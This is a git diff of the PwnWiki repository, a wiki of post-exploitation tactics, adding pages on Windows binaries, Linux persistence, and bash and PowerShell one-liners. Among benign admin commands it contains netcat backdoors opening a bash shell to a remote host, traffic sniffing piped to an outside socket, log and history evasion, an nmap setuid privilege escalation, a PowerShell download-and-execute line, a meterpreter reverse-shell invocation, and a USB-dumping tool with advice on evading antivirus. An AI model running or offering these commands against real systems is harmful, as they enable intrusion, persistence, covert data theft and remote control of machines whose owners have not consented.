diff --git a/bins/windows.md b/bins/windows.md new file mode 100644 index 0000000..964b81a --- /dev/null +++ b/bins/windows.md @@ -0,0 +1,7 @@ +# Useful Windows Binaries + +Useful Windows binary tools that can be used for post exploitation. + +| Tool | Description / Importance | Contributer | +| ----------- | ------------------------ | ----------- | +| usbdump.exe | Once executed, usbdump will run in the background and will dump the contents of all connected usb devices to a randomly numbered folder within the same directory as the usbdump.exe program. Useful for grabbing the contents of any usb devices later connected to a compromized machine. May have to modify it to bypass AV as its signature is in quite a few AV's. | Ian | diff --git a/bins/windows/index.md b/bins/windows/index.md new file mode 100644 index 0000000..964b81a --- /dev/null +++ b/bins/windows/index.md @@ -0,0 +1,7 @@ +# Useful Windows Binaries + +Useful Windows binary tools that can be used for post exploitation. + +| Tool | Description / Importance | Contributer | +| ----------- | ------------------------ | ----------- | +| usbdump.exe | Once executed, usbdump will run in the background and will dump the contents of all connected usb devices to a randomly numbered folder within the same directory as the usbdump.exe program. Useful for grabbing the contents of any usb devices later connected to a compromized machine. May have to modify it to bypass AV as its signature is in quite a few AV's. | Ian | diff --git a/index.md b/index.md index d7c557b..b3b6bae 100644 --- a/index.md +++ b/index.md @@ -8,7 +8,7 @@ ### Live Online Copy: -You can find a copy of the project online at: http://PwnWiki.io +You can find a copy of the project online at: http://pwnwiki.io ### Offline Use: @@ -32,8 +32,7 @@ Curators: * [@tekwizz123](https://twitter.com/tekwizz123) [gimmick:TwitterFollow](@tekwizz123) * [@jakx_](https://twitter.com/jakx_) [gimmick:TwitterFollow](@jakx_) * [@TheColonial](https://twitter.com/TheColonial) [gimmick:TwitterFollow](@TheColonial) - * [@Wireghoul](https://twitter.com/Wireghoul) [gimmick:TwitterFollow](@Wireghoul) - + * [@Wireghoul](https://twitter.com/Wireghoul) [gimmick:TwitterFollow](@Wireghoul) If you would like to become a curator, please contact [mubix@hak5.org](mailto:mubix@hak5.org) diff --git a/index.md~ b/index.md~ new file mode 100644 index 0000000..4163770 --- /dev/null +++ b/index.md~ @@ -0,0 +1,40 @@ +![](images/logo.jpg) + +[Image Generated Here](http://www.addletters.com/pictures/restaurant-sign-generator/4772466.htm#.UplRZ42PuuY) + +### PwnWiki.io is a collection TTPs (tools, tactics, and procedures) for what to do after access has been gained. + +- - - - - - + +### Live Online Copy: + +You can find a copy of the project online at: http://pwnwiki.io + +### Offline Use: + + 1. Clone the repository or pull the archive ([download zip](https://github.com/pwnwiki/pwnwiki.github.io/archive/master.zip)) of the repo + 2. Open index.html + 3. Most modern browsers don't allow the access of local files from a locally loaded HTML file. On Windows you can use [Mongoose Tiny](http://cesanta.com/downloads.html) or [HFS](http://www.rejetto.com/hfs/) to host the files locally. On OSX and Linux `python -m SimpleHTTPServer` seems to work just fine. + +#### Referenced tools can be found here: https://github.com/mubix/post-exploitation (If they aren't built into the OS) + +- - - - - - +#### Submitting Content +We want/need your help! Please contribute to this project is via GitHub (https://github.com/pwnwiki/pwnwiki.github.io). That allows us to get your project-ready content incorporated into the wiki fast. + +We realize that not everyone can/wants to submit content via GitHub and that's cool. If your go-to content is not up here and you don't want to spend the time becoming a Git Jedi, just visit our [Google Form](https://docs.google.com/forms/d/1N7-jRjnUXoz-UwB2h0du2IrskFJW6hBGs4YsTwvEncE/viewform). Due to the large amount of submissions and content, there may be a delay between your posting and us getting your content into the project. Thanks for your submissions and your patience! + +- - - - - - +Curators: + + * [@mubix](https://twitter.com/mubix) + * [@WebBreacher](https://twitter.com/webbreacher) + * [@tekwizz123](https://twitter.com/tekwizz123) + * [@jakx_](https://twitter.com/jakx_) + * [@TheColonial](https://twitter.com/TheColonial) + * [@Wireghoul](https://twitter.com/Wireghoul) + + +If you would like to become a curator, please contact [mubix@hak5.org](mailto:mubix@hak5.org) + +[gimmick:ForkMeOnGitHub ({ color: 'red', position: 'right' })](http://www.github.com/pwnwiki/pwnwiki.github.io/) diff --git a/persistence/linux/general.md b/persistence/linux/general.md new file mode 100644 index 0000000..0257939 --- /dev/null +++ b/persistence/linux/general.md @@ -0,0 +1,21 @@ + + + +# Linux General Persistence Commands + +Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the bash prompt. + +###Run command as a daemon +*Note this doesn't work with anything from apache. Runs like & but doesn't care if the parent process closes* +```bash +setsid *command* +``` + diff --git a/persistence/linux/general.md~ b/persistence/linux/general.md~ new file mode 100644 index 0000000..e24603f --- /dev/null +++ b/persistence/linux/general.md~ @@ -0,0 +1,21 @@ + + + +# Linux General Persistence Commands + +Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the bash prompt. + +###Run command as a daemon +*Note this doesn't work with anything from apache* +```bash +setsid *command* +``` + diff --git a/persistence/linux/index.md b/persistence/linux/index.md new file mode 100644 index 0000000..613c833 --- /dev/null +++ b/persistence/linux/index.md @@ -0,0 +1,5 @@ +# Linux Persistence Commands + +Commands that help you maintain control over a compromised system. + + * [General Commands](general.md) - Commands your could/should use to maintain your hold on the compromised system. diff --git a/scripting/bash.md b/scripting/bash.md index 37dd3f3..abf1347 100644 --- a/scripting/bash.md +++ b/scripting/bash.md @@ -89,12 +89,31 @@ grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' tcpdump -w - | nc -v 8.8.8.8 9999 ``` -**Recursively search for files within a directory** +**Recursively search for text contained in files within a directory** ```bash zcat -rf ./* | grep "searchstring" ``` +**Recursively search for files with the specified word within them** +*Submitted by cat on Google Fourms* +```bash +ls -a | find | grep -i "string" +``` + +**Netcat backdoor** +*Does not work with most distro's default version of netcat (most do not define ENABLE_GAPING_SECURITY_HOLE which turns on -e)* +```bash +nc -e /bin/bash *remotecomputer* *port* +OR +nc -e /bin/bash -lp *port* +``` + +**View CPU Information** +```bash +cat /proc/cpuinfo +``` + Credits ----------- -Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions +Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions) diff --git a/scripting/bash.md~ b/scripting/bash.md~ new file mode 100644 index 0000000..ad05c61 --- /dev/null +++ b/scripting/bash.md~ @@ -0,0 +1,113 @@ +# Bash Commands for Post Exploitation + +One liners +----------- + +**Resolve a list of hostnames to IP addresses** +```bash +awk < hostnames.txt '{ system("resolveip -s " $1) }' +``` + +**IIS 6.0 IP Disclosure** +```bash +curl -l -O -H "Host:" "example.com" +``` + +**Connect to SSL websites** +```bash +openssl s_client -connect example.com:443 +``` + +**Convert base64 to text** +```bash +echo 'base64string' | base64 -d (Use -D on OSX) +``` + +**Decode ASCII shellcode** +```bash +echo -e *shellcode hex string* (may need to use -i to ignore bad chars) +``` + +**Enumerate DNS of Class C** +```bash +for ip in $(seq 1 254); do; host 10.1.1.$ip | grep "name pointer"; done +``` + +**SSH to box and hide from "who" and "lastlog"** +```bash +ssh andrew@10.1.1.1 -T /bin/bash +``` + +**Prevent terminal logging** +```bash +unset HISTFILE +``` + +**Add immutable attribute to a unix file** +```bash +chattr +i *file* +``` + +**SSH into host2 through host1** +```bash +ssh -o "proxycommand ssh -W host2 host1" host2 +``` + +**Nmap setuid privesc** +```bash +nmap --script <(echo 'os.execute("/bin/sh")') +nmap --interactive (for older versions) +``` + +**Transfer files through SSH** +```bash +ssh test@10.1.1.1 "cat test.tar.gz" > test.tar.gz +``` + +**Internal port redirect for bypassing services** +```bash +iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4444 +``` + +**Enable forwarding on the fly** +```bash +sysctl -w net.ipv4.ip_forward=1 +``` + +**Kill with USR1 developer defined signal** +```bash +kill -USR1 +``` + +**Pull IP addresses from a file** +```bash +grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' +``` + +**Sniff traffic with tcpdump and send to remote tcp socket** +```bash +tcpdump -w - | nc -v 8.8.8.8 9999 +``` + +**Recursively search for text contained in files within a directory** +```bash +zcat -rf ./* | grep "searchstring" +``` + +**Recursively search for files with the specified word within them** +*Submitted by cat on Google Fourms* +```bash +ls -a | find | grep -i "string" +``` + +**Netcat backdoor** +```bash +nc -e /bin/bash *remotecomputer* *port* +OR +nc -e /bin/bash -lp *port* +``` + +Credits +----------- +Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions) + diff --git a/scripting/powershell.md b/scripting/powershell.md index f9a19b6..c98e723 100644 --- a/scripting/powershell.md +++ b/scripting/powershell.md @@ -65,49 +65,174 @@ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 * **Output**: *
**Windows 7:** Show/Hide
PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280-
1000")).translate([System.Security.Principal.NTAccount])).value
WIN-244VDGE5OGH\johndoe
- ## Using the PowerShell Active Directory Modules - ### Via https://www.trustedsec.com/uncategorized/powershell-reconnaissance/ - ### Setting Credentials +## Using the PowerShell Active Directory Modules +### Via https://www.trustedsec.com/uncategorized/powershell-reconnaissance/ +### Setting Credentials * **Command with arguments**: `$cred = Get-Credential` * **Description**: Stores valid credentials in the $cred variable for use with the Active Directory Modules. * **Notes**: These following commands require the Powershell Active Directory Modules to be installed. Steps to install for Win7 are detailed [here] (http://blogs.msdn.com/b/rkramesh/archive/2012/01/17/how-to-add-active-directory-module-in-powershell-in-windows-7.aspx) - ### Query to List "Domain Admins" +### Query to List "Domain Admins" * **Command with arguments**: `Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"` * **Output**: *
**Windows 7:** Show/Hide
distinguishedName : CN=Administrator,CN=Users,DC=pwnt,DC=com
name : Administrator
objectClass : user
objectGUID : 1fd60ff8-07a4-4c6e-9a1e-7cd0d7bb97db
SamAccountName : Administrator
SID : S-1-5-21-2027135834-1792351174-2509185371-500
- ### Enumerate All Servers on Domain +### Enumerate All Servers on Domain * **Command with arguments**: `Get-ADComputer -Credential $cred -server pwnt.com -LDAPFilter "(&(objectCategory=computer)(opera tingSystem=*Server*))" |select name` * **Output**: *
**Windows 7:** Show/Hide
name
----
PWNT-DC
-Exchange1
-SharePoint1
+Exchange1
SharePoint1 # Powershell CLI short hand: +## PowerShell.exe + +Parameter Shortcut(s) + * Command `c` + * EncodedArguments `ea`, `encodeda` + * EncodedCommand `e`,`ec` + * ExecutionPolicy `ex`,`ep` + * File `f` + * Help `-h`,`-?` or `/h`,`/?` + * InputFormat `i`,`if` + * NoExit `noe` + * NoLogo `nol` + * NoProfile `nop` + * NonInteractive `noni` + * OutputFormat `o`,`of` + * Sta `s` + * WindowStyle `w` -### PowerShell.exe +## powershell_ise.exe Parameter - Shortcut(s) -* Command - `c` -* EncodedArguments - `ea`, `encodeda` -* EncodedCommand - `e`,`ec` -* ExecutionPolicy - `ex`,`ep` -* File - `f` -* Help - `-h`,`-?` or `/h`,`/?` -* InputFormat - `i`,`if` -* NoExit - `noe` -* NoLogo - `nol` -* NoProfile - `nop` -* NonInteractive - `noni` -* OutputFormat - `o`,`of` -* Sta - `s` -* WindowStyle - `w` + * File - `f` + * Help - `-h`,`-?` or `/h`,`/?` + * Mta - `m` + * NoProfile - `n` -### powershell_ise.exe -Parameter - Shortcut(s) -* File - `f` -* Help - `-h`,`-?` or `/h`,`/?` -* Mta - `m` -* NoProfile - `n` \ No newline at end of file + +## Get Info About All Connected Drives + * **Command with arguments**: `[System.IO.DriveInfo]::GetDrives()` + * **Output**: + *
**Windows 7:** Show/Hide
+ Name : C:\ + DriveType : Fixed + DriveFormat : NTFS + IsReady : True + AvailableFreeSpace : 111111111111 + TotalFreeSpace : 111111111111 + TotalSize : 111111111111 + RootDirectory : C:\ + VolumeLabel : HP +
+ Name : D:\ + DriveType : Fixed + DriveFormat : NTFS + IsReady : True + AvailableFreeSpace : 111111111111 + TotalFreeSpace : 111111111111 + TotalSize : 111111111111 + RootDirectory : D:\ + VolumeLabel : DATA +
+ Name : E:\ + DriveType : CDRom + DriveFormat : + IsReady : False + AvailableFreeSpace : + TotalFreeSpace : + TotalSize : + RootDirectory : E:\ + VolumeLabel : +
+ +## Obtain detailed information about a running process or service + * **Command with arguments**: `gps | ?{$_.name -match ""} | ?{$_.id -match ""} | select *` + * **Output**: + *
**Windows 7:** Show/Hide
+ __NounName : Process + Name : firefox + Handles : 383 + VM : 272830464 + WS : 90185728 + PM : 69402624 + NPM : 24676 + Path : C:\Program Files\Mozilla Firefox\firefox.exe + Company : Mozilla Corporation + CPU : 2.1684139 + FileVersion : 26.0 + ProductVersion : 26.0 + Description : Firefox + Product : Firefox + Id : 3176 + PriorityClass : Normal + HandleCount : 383 + WorkingSet : 90185728 + PagedMemorySize : 69402624 + PrivateMemorySize : 69402624 + VirtualMemorySize : 272830464 + TotalProcessorTime : 00:00:02.1684139 + BasePriority : 8 + ExitCode : + HasExited : False + ExitTime : + Handle : 1904 + MachineName : . + MainWindowHandle : 131426 + MainWindowTitle : Mozilla Firefox Start Page - Mozilla Firefox + MainModule : System.Diagnostics.ProcessModule (firefox.exe) + MaxWorkingSet : 1413120 + MinWorkingSet : 204800 + Modules : {System.Diagnostics.ProcessModule (firefox.exe), System.Diagnostics.ProcessModule (ntdll.d + ll), System.Diagnostics.ProcessModule (kernel32.dll), System.Diagnostics.ProcessModule (KE + RNELBASE.dll)...} + NonpagedSystemMemorySize : 24676 + NonpagedSystemMemorySize64 : 24676 + PagedMemorySize64 : 69402624 + PagedSystemMemorySize : 277804 + PagedSystemMemorySize64 : 277804 + PeakPagedMemorySize : 77041664 + PeakPagedMemorySize64 : 77041664 + PeakWorkingSet : 97169408 + PeakWorkingSet64 : 97169408 + PeakVirtualMemorySize : 281219072 + PeakVirtualMemorySize64 : 281219072 + PriorityBoostEnabled : True + PrivateMemorySize64 : 69402624 + PrivilegedProcessorTime : 00:00:00.4992032 + ProcessName : firefox + ProcessorAffinity : 1 + Responding : True + SessionId : 1 + StartInfo : System.Diagnostics.ProcessStartInfo + StartTime : 1/29/2014 8:02:12 PM + SynchronizingObject : + Threads : {2664, 772, 3160, 544...} + UserProcessorTime : 00:00:01.6692107 + VirtualMemorySize64 : 272830464 + EnableRaisingEvents : False + StandardInput : + StandardOutput : + StandardError : + WorkingSet64 : 90185728 + Site : + Container : +
+ +### Translate SID to username + * **Command with arguments**: `((New-Object System.Security.Principal.SecurityIdentifier("")).translate([System.Security.Principal.NTAccount])).value` + * **Output**: + *
**Windows 7:** Show/Hide
+ NT AUTHORITY\SELF +
+ +### Grab each user on the local system and list their last login time, their SSID and their user path. + * **Command with arguments**: `gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto` + * **Output**: + *
**Windows 7:** Show/Hide
+WIN-C77DTCDJS11 S-1-5-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx-xxxx x/xx/2014 x:xx:xx PM C:\Users\xxxx +WIN-C77DTCDJS11 S-1-5-20 C:\Windows\ServiceProfiles\Netwo... +WIN-C77DTCDJS11 S-1-5-19 C:\Windows\ServiceProfiles\Local... +WIN-C77DTCDJS11 S-1-5-18 C:\Windows\system32\config\syste... +
\ No newline at end of file diff --git a/scripting/powershell.md~ b/scripting/powershell.md~ new file mode 100644 index 0000000..9461b51 --- /dev/null +++ b/scripting/powershell.md~ @@ -0,0 +1,121 @@ + + + +# Windows Powershell Commands and Scripts for Post Exploitation + +# One liners + +**Download and Execute Remote Powershell Script** + +``` +iex (New-Object Net.WebClient).DownloadString("http://host/file.txt") +``` + +**Download and Save File** + +``` +(new-object System.Net.WebClient).Downloadfile('http://host/file.exe', 'file.exe') +``` + +**Enumerate Allowed Outbound Ports 1-1024 via [securitypadawan.blogspot.com](http://securitypadawan.blogspot.com/2013/04/quickly-determine-allowed-outbound-ports.html)** + +``` +$ErrorActionPreference = "silentlycontinue"; 1..1024 | % {$req = [System.Net.WebRequest]::Create("http://letmeoutofyour.net:$_"); $req.Timeout = 600; $resp = $req.GetResponse(); $respstream = $resp.GetResponseStream(); +$stream = new-object System.IO.StreamReader $respstream; $out = $stream.ReadToEnd(); if ($out.trim() -eq "w00tw00t"){echo "$_ Allowed out"}} +``` + +**Reverse Shell Using [PowerSploit's Invoke-Shellcode](https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1)** + +``` +Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.10 -Lport 443 -Force +``` + +---- + +# Commands with Sample Output +## Hardware +### Get BIOS Information + * **Command with arguments**: `gwmi win32_bios` + * **Description**: Retrieves BIOS information including system serial number. + * **Output**: + *
**Windows 7:** Show/Hide
PS C:\Users\johndoe> gwmi win32_bios
SMBIOSBIOSVersion : 6.00
Manufacturer : Phoenix Technologies LTD
Name : PhoenixBIOS 4.0 Release 6.0
SerialNumber : VMware-56 4d 9b 0f 26 ba 8c f9-6e 7a 1e 33 5d 3c f0 dc
Version : INTEL - 6040000
+ +### Get Drive Information + * **Command with arguments**: `[System.IO.DriveInfo]::GetDrives()` + * **Output**: + *
**Windows 7:** Show/Hide
PS C:\Users\johndoe> [System.IO.DriveInfo]::GetDrives()

Name : C:\
DriveType : Fixed
DriveFormat : NTFS
IsReady : True
AvailableFreeSpace : 55568087552
TotalFreeSpace : 55568087552
TotalSize : 159876850304
RootDirectory : C:\
VolumeLabel :

Name : D:\
DriveType : CDRom
DriveFormat :
IsReady : False
AvailableFreeSpace :
TotalFreeSpace :
TotalSize :
RootDirectory : D:\
VolumeLabel :

Name : G:\
DriveType : Removable
DriveFormat :
IsReady : False
AvailableFreeSpace :
TotalFreeSpace :
TotalSize :
RootDirectory : G:\
VolumeLabel :

Name : V:\
DriveType : Network
DriveFormat : NTFS
IsReady : True
AvailableFreeSpace : 259182640616
TotalFreeSpace : 259182640616
TotalSize : 827361812256
RootDirectory : V:\
VolumeLabel : TestMappedDrive
+ +## User Information +### Display Username, SID, Last Used + * **Command with arguments**: `gwmi win32_userprofile | select -unique @{name="Name";expression={$_.__server}},@{name="SID";expression={$_.sid}},@{name="LastUseTime";expression={$_.converttodatetime($_.lastusetime)}},localpath | ft -auto` + * **Description**: Retrieves information about system users. + * **Output**: + *
**Windows 7:** Show/Hide
PS C:\Users\johndoe> gwmi win32\_userprofile | select -unique @{name="Name";expression={$\_.\_\_server}},@{name="SID";expressi
on={$\_.sid}},@{name="LastUseTime";expression={$\_.converttodatetime($\_.lastusetime)}},localpath | ft -auto

Name            SID                                            LastUseTime          localpath
----            ---                                            -----------          ---------
WIN-244VDGE5OGH S-1-5-21-1319606305-3131390644-2280705280-1000 4/13/2012 7:52:02 PM C:\Users\johndoe
WIN-244VDGE5OGH S-1-5-20                                                            C:\Windows\ServiceProfiles\Netwo...
WIN-244VDGE5OGH S-1-5-19                                                            C:\Windows\ServiceProfiles\Local...
WIN-244VDGE5OGH S-1-5-18                                                            C:\Windows\system32\config\syste...
+ +### Translate SID to Username + * **Command with arguments**: `((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-19")).translate([System.Security.Principal.NTAccount])).value` + * **Output**: + *
**Windows 7:** Show/Hide
PS C:\Users\johndoe> ((New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-1319606305-3131390644-2280705280-
1000")).translate([System.Security.Principal.NTAccount])).value
WIN-244VDGE5OGH\johndoe
+ + ## Using the PowerShell Active Directory Modules + ### Via https://www.trustedsec.com/uncategorized/powershell-reconnaissance/ + ### Setting Credentials + * **Command with arguments**: `$cred = Get-Credential` + * **Description**: Stores valid credentials in the $cred variable for use with the Active Directory Modules. + * **Notes**: These following commands require the Powershell Active Directory Modules to be installed. Steps to install for Win7 are detailed [here] (http://blogs.msdn.com/b/rkramesh/archive/2012/01/17/how-to-add-active-directory-module-in-powershell-in-windows-7.aspx) + + ### Query to List "Domain Admins" + * **Command with arguments**: `Get-ADGroupMember -Credential $cred -server pwnt.com "Domain Admins"` + * **Output**: + *
**Windows 7:** Show/Hide
distinguishedName : CN=Administrator,CN=Users,DC=pwnt,DC=com
name : Administrator
objectClass : user
objectGUID : 1fd60ff8-07a4-4c6e-9a1e-7cd0d7bb97db
SamAccountName : Administrator
SID : S-1-5-21-2027135834-1792351174-2509185371-500
+ + ### Enumerate All Servers on Domain + * **Command with arguments**: `Get-ADComputer -Credential $cred -server pwnt.com -LDAPFilter "(&(objectCategory=computer)(opera +tingSystem=*Server*))" |select name` + * **Output**: + *
**Windows 7:** Show/Hide
name
----
PWNT-DC
+Exchange1
+SharePoint1
+ + ### Get Info About All Connected Drives + * **Command with arguments**: `[System.IO.DriveInfo]::GetDrives()` + * **Output**: + *
**Windows 7:** Show/Hide
+ Name : C:\ + DriveType : Fixed + DriveFormat : NTFS + IsReady : True + AvailableFreeSpace : 111111111111 + TotalFreeSpace : 111111111111 + TotalSize : 111111111111 + RootDirectory : C:\ + VolumeLabel : HP +
+ Name : D:\ + DriveType : Fixed + DriveFormat : NTFS + IsReady : True + AvailableFreeSpace : 111111111111 + TotalFreeSpace : 111111111111 + TotalSize : 111111111111 + RootDirectory : D:\ + VolumeLabel : DATA +
+ Name : E:\ + DriveType : CDRom + DriveFormat : + IsReady : False + AvailableFreeSpace : + TotalFreeSpace : + TotalSize : + RootDirectory : E:\ + VolumeLabel : +